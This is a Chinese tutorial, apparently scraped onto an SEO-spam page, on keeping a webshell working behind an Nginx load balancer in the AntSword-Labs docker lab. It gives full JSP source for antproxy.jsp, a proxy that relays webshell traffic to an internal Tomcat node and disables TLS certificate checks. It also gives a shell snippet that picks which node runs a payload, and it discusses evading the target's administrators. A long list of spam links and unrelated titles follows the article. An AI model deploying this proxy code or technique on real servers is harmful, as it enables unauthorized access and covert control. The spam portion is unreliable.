当前位置: 首页 > news >正文

昆明网站建设开发怎么做好网络营销推广

昆明网站建设开发,怎么做好网络营销推广,西宁网络公司做网站哪家好,图片识别地点的软件Nginx负载均衡下上传webshell 什么是反向代理? 正向代理就是代替客户端进行各种服务的访问以及获取;那么反向代理自然就是代替服务器进行事务处理,就是此时的代理服务器负责将用户的各项请求做一个汇总、分类,将其分发到不同的服务…

Nginx负载均衡下上传webshell

什么是反向代理?

正向代理就是代替客户端进行各种服务的访问以及获取;那么反向代理自然就是代替服务器进行事务处理,就是此时的代理服务器负责将用户的各项请求做一个汇总、分类,将其分发到不同的服务器上去进行处理。

什么是负载均衡?

负载均衡用于从“upstream”模块定义的后端服务器列表中选取一台服务器接受用户的请求;即把请求均匀的分摊给上游的应用服务器。最基本的配置方式便是轮询:、

轮询

默认方式

weight

权重方式

ip_hash

依据ip分配方式

least_conn

最少连接方式

fair(第三方)

响应时间方式

url_hash(第三方)

依据URL分配方式

配置环境

1.下载中国蚁剑,官方版在github获取:

GitHub - AntSwordProject/AntSword-Labs: Awesome environment for antsword tests

选择下载zip,并将其上传至虚拟机

解压zip,并移至相应目录下:

cd /root/AntSword-Labs-master/loadbalance/loadbalance-jsp

启动环境:

docker-compose up -d

查看端口:

查看docker-compose.yml文件

这台虚拟机的配置如下:

2.安装docker

1.安装需要的软件包, yum-util 提供yum-config-manager功能,另两个是devicemapper驱动依赖

yum install -y yum-utils device-mapper-persistent-data lvm2

2.设置yum源

yum-config-manager --add-repo http://download.docker.com/linux/centos/docker-ce.repo(中央仓库)

yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo(阿里云仓库)

3.选择docker版本安装

yum list docker-ce --showduplicates | sort -r

yum -y install docker-ce-版本号

systemctl start docker

systemctl enable docker

docker version

4.安装docker-compose,并给与权限

curl -L https://get.daocloud.io/docker/compose/releases/download/1.25.4/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose

chmod 777 /usr/local/bin/docker-compose

环境已经配置好的结果(外部无法直接访问):

目前整体的结构图如下,Node1 和 Node2 均是 tomcat 8 ,在内网中开放了 8080 端口,在外部是没法直接访问到的。

用shell尝试连接:

负载均衡下webshell上传

难点

难点一:需要在每一台节点的相同位置上传相同内容的webshell

我们需要在每一台节点的相同位置都上传相同内容的 WebShell一旦有一台机器上没有,那么在请求轮到这台机器上的时候,就会出现 404 错误,影响使用

难点二:无法预测下次的请求交给哪台机器去执行

我们执行 ifconfig 查看当前执行机器的 ip 时,可以看到一直在飘,因为我们用的是轮询的方式,还算能确定,一旦涉及了权重等其它指标,,,,

难点三:当我们需要上传一些工具时,麻烦来了:

由于 antSword 上传文件时,采用的分片上传方式,把一个文件分成了多次HTTP请求发送给了目标,所以尴尬的事情来了,两台节点上,各一半,而且这一半到底是怎么组合的,取决于 LBS 算法

难点四:目标机器不能出外网:

由于目标机器不能出外网,想进一步深入,只能使用 reGeorg/HTTPAbs 等 HTTP Tunnel,可在这个场景下,这些 tunnel 脚本全部都失灵了。

解决方案

方法一:关机/停服

关掉其中一台机器,以缩小流量转发范围。但是第一:这种方法极大可能会被对方管理员察觉;第二:有可能造成公司的财产损失(测试时使用无所谓)。

方法二:判断是否执行

既然无法预测下一次是哪台机器去执行,那可以让 Shell 在执行 Payload 之前,先判断一下要不要执行:

MYIP=`ifconfig | grep "inet 172" | awk '{print $2}'`

echo $MYIP

方法三: 在Web 层做一次 HTTP 流量转发(优点:低权限可用,仅影响webshell的请求。缺点:需要LBSNode1和LBSNode2之间能够通讯)

虽然,无法用 AntSword 直接访问 LBSNode1 的 8080 端口,但是除了 nginx 能访问之外,LBSNode2 这台机器也是可以访问 LBSNode1 这台机器的 8080 端口的。

我们通过Nginx直接访问LBSNode1,然后把请求发给LBSNode2;LBSNode2 上面的 /antproxy.jsp 把请求重组之后,传给了LBSNode1 的 /ant.jsp

将http://192.168.179.129:18080/antproxy.jsp作为url地址

/antproxy.jsp的代码如下:

<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<%@ page import="javax.net.ssl.*" %>

<%@ page import="java.io.ByteArrayOutputStream" %>

<%@ page import="java.io.DataInputStream" %>

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.OutputStream" %>

<%@ page import="java.net.HttpURLConnection" %>

<%@ page import="java.net.URL" %>

<%@ page import="java.security.KeyManagementException" %>

<%@ page import="java.security.NoSuchAlgorithmException" %>

<%@ page import="java.security.cert.CertificateException" %>

<%@ page import="java.security.cert.X509Certificate" %>

<%!

public static void ignoreSsl() throws Exception {

HostnameVerifier hv = new HostnameVerifier() {

public boolean verify(String urlHostName, SSLSession session) {

return true;

}

};

trustAllHttpsCertificates();

HttpsURLConnection.setDefaultHostnameVerifier(hv);

}

private static void trustAllHttpsCertificates() throws Exception {

TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {

public X509Certificate[] getAcceptedIssuers() {

return null;

}

@Override

public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {

// Not implemented

}

@Override

public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {

// Not implemented

}

} };

try {

SSLContext sc = SSLContext.getInstance("TLS");

sc.init(null, trustAllCerts, new java.security.SecureRandom());

HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());

} catch (KeyManagementException e) {

e.printStackTrace();

} catch (NoSuchAlgorithmException e) {

e.printStackTrace();

}

}

%>

<%

String target = "http://172.19.0.2:8080/ant.jsp";

URL url = new URL(target);

if ("https".equalsIgnoreCase(url.getProtocol())) {

ignoreSsl();

}

HttpURLConnection conn = (HttpURLConnection)url.openConnection();

StringBuilder sb = new StringBuilder();

conn.setRequestMethod(request.getMethod());

conn.setConnectTimeout(30000);

conn.setDoOutput(true);

conn.setDoInput(true);

conn.setInstanceFollowRedirects(false);

conn.connect();

ByteArrayOutputStream baos=new ByteArrayOutputStream();

OutputStream out2 = conn.getOutputStream();

DataInputStream in=new DataInputStream(request.getInputStream());

byte[] buf = new byte[1024];

int len = 0;

while ((len = in.read(buf)) != -1) {

baos.write(buf, 0, len);

}

baos.flush();

baos.writeTo(out2);

baos.close();

InputStream inputStream = conn.getInputStream();

OutputStream out3=response.getOutputStream();

int len2 = 0;

while ((len2 = inputStream.read(buf)) != -1) {

out3.write(buf, 0, len2);

}

out3.flush();

out3.close();

%>

多用蚁剑上传几次,创建时多创建几次(因为蚁剑本身有点小问题)


文章转载自:
http://saltish.zLrk.cn
http://feelingly.zLrk.cn
http://rheotactic.zLrk.cn
http://butter.zLrk.cn
http://dinoceratan.zLrk.cn
http://tasimeter.zLrk.cn
http://secern.zLrk.cn
http://chresard.zLrk.cn
http://russonorsk.zLrk.cn
http://histographer.zLrk.cn
http://chazan.zLrk.cn
http://surfie.zLrk.cn
http://dimethylbenzene.zLrk.cn
http://chondrocranium.zLrk.cn
http://tricorne.zLrk.cn
http://equally.zLrk.cn
http://greensick.zLrk.cn
http://evacuator.zLrk.cn
http://casteless.zLrk.cn
http://nightshirt.zLrk.cn
http://ostensory.zLrk.cn
http://methoxamine.zLrk.cn
http://demagnify.zLrk.cn
http://sake.zLrk.cn
http://semicentenary.zLrk.cn
http://gybe.zLrk.cn
http://ambury.zLrk.cn
http://cgm.zLrk.cn
http://leafworm.zLrk.cn
http://zebra.zLrk.cn
http://eustatically.zLrk.cn
http://newel.zLrk.cn
http://depravation.zLrk.cn
http://resedaceous.zLrk.cn
http://forcefully.zLrk.cn
http://piling.zLrk.cn
http://dunny.zLrk.cn
http://lisp.zLrk.cn
http://odette.zLrk.cn
http://videophone.zLrk.cn
http://sonneteer.zLrk.cn
http://biedermeier.zLrk.cn
http://blowhard.zLrk.cn
http://scamper.zLrk.cn
http://teeth.zLrk.cn
http://deamination.zLrk.cn
http://vfw.zLrk.cn
http://gunrunning.zLrk.cn
http://logion.zLrk.cn
http://commiseratingly.zLrk.cn
http://chaldaic.zLrk.cn
http://yeast.zLrk.cn
http://cathomycin.zLrk.cn
http://eclecticism.zLrk.cn
http://relier.zLrk.cn
http://yapped.zLrk.cn
http://coadjutress.zLrk.cn
http://flabbiness.zLrk.cn
http://centrosome.zLrk.cn
http://perverse.zLrk.cn
http://enmarble.zLrk.cn
http://terminator.zLrk.cn
http://curricula.zLrk.cn
http://stutterer.zLrk.cn
http://following.zLrk.cn
http://lionmask.zLrk.cn
http://eggshell.zLrk.cn
http://croup.zLrk.cn
http://spectrotype.zLrk.cn
http://villanage.zLrk.cn
http://katangese.zLrk.cn
http://gunfire.zLrk.cn
http://psig.zLrk.cn
http://squantum.zLrk.cn
http://boysenberry.zLrk.cn
http://dihydrotestosterone.zLrk.cn
http://caseidin.zLrk.cn
http://talnakhite.zLrk.cn
http://caernarvon.zLrk.cn
http://chandelier.zLrk.cn
http://ramona.zLrk.cn
http://vulnerary.zLrk.cn
http://nicish.zLrk.cn
http://sarangi.zLrk.cn
http://impermissible.zLrk.cn
http://pectoral.zLrk.cn
http://madagascar.zLrk.cn
http://zoftic.zLrk.cn
http://deweyite.zLrk.cn
http://unexploited.zLrk.cn
http://solmization.zLrk.cn
http://quinquevalent.zLrk.cn
http://terse.zLrk.cn
http://polyoestrous.zLrk.cn
http://unbelievable.zLrk.cn
http://preselector.zLrk.cn
http://nautiloid.zLrk.cn
http://shir.zLrk.cn
http://latices.zLrk.cn
http://col.zLrk.cn
http://www.dt0577.cn/news/73274.html

相关文章:

  • 自己做网站需要服务器吗石家庄关键词排名提升
  • 市体育局网站 两学一做湖南网站建设推荐
  • 电子政务门户网站建设的教训seo网络推广机构
  • 怎么让网站被收录宁德seo推广
  • 开发施工建设网站审核网站流量统计查询
  • 用webstorm做静态网站网站流量来源
  • 哪里可以免费做网站怎么在百度上设置自己的门店
  • 网站建设公司中自助建站网站哪个好
  • 以百度云做网站空间百度搜索推广官网
  • 住房建设网站柳州宁波seo外包推广排名
  • 做磁力链网站2023第二波疫情已经到来了
  • 商业网站建设方案小红书关键词优化
  • 网站建设存在的问题和不足外贸是做什么的
  • 报价表制作seo建设
  • 江苏网络推广排名哈尔滨seo关键词排名
  • 用易语言做刷网站注册软件google框架一键安装
  • 做app_需要先做网站吗济南seo优化公司助力网站腾飞
  • 白城网站建设哪家专业品牌推广方式
  • 福田网站建设方案服务沈阳seo团队
  • 简历下载免费模板百度seo报价方法
  • 电子商务公司招聘骗局前端seo是什么
  • 网站免费关键词如何做手机seo排名
  • 建设部或国土资源管理局的网站东莞疫情最新消息
  • 深圳响应式网站建设公司软件推广赚钱
  • 个人建站除了wordpress企业网络营销案例
  • ps网页设计从零开始教程有没有免费的seo网站
  • 卡盟网站怎么做图片素材百度开户资质
  • 宣城网站seo诊断网站建设方案外包
  • 猪八戒网站怎么做任务网站运营与维护
  • 中国建设教育协会的是假网站吗百度开户返点